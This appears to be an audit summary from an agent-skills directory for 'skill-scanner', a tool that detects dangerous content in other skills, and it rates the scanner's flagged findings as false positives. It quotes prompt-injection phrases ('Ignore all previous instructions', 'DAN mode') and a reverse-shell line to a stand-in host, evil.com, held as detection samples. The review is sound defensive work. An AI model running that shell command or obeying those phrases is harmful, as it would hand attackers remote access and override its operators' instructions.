The Agent Skills Directory

[PROMPT_INJECTION]: The skill contains numerous prompt injection strings (e.g., 'Ignore all previous instructions', 'DAN mode') within the file references/prompt-injection-patterns.md. These are identified as legitimate reference documentation for the scanner's detection capabilities rather than active attacks against the agent.
[REMOTE_CODE_EXECUTION]: The file references/dangerous-code-patterns.md contains examples of remote code execution and reverse shells (e.g., bash -i >& /dev/tcp/evil.com/4444). These are provided as static analysis targets for the scanner to identify in other skills and do not execute as part of this skill.
[DATA_EXFILTRATION]: Examples of data exfiltration via HTTP and DNS are documented in references/dangerous-code-patterns.md. These are used for educational and detection purposes.
[COMMAND_EXECUTION]: The skill requests the Bash tool, which is justified by the requirement to run the bundled scripts/scan_skill.py analysis script using the uv tool.
[CREDENTIALS_UNSAFE]: The skill includes patterns for AWS keys, GitHub tokens, and private keys in scripts/scan_skill.py and references/dangerous-code-patterns.md. These are used as regex signatures for detecting hardcoded secrets in scanned repositories.
[SAFE]: The automated scanner findings (Prompt Injection and YARA hits) are evaluated as false positives in this context because the 'malicious' content is encapsulated in reference files for a security auditing tool. The Python script scripts/scan_skill.py implements safe static analysis without executing the code it inspects.

skill-scanner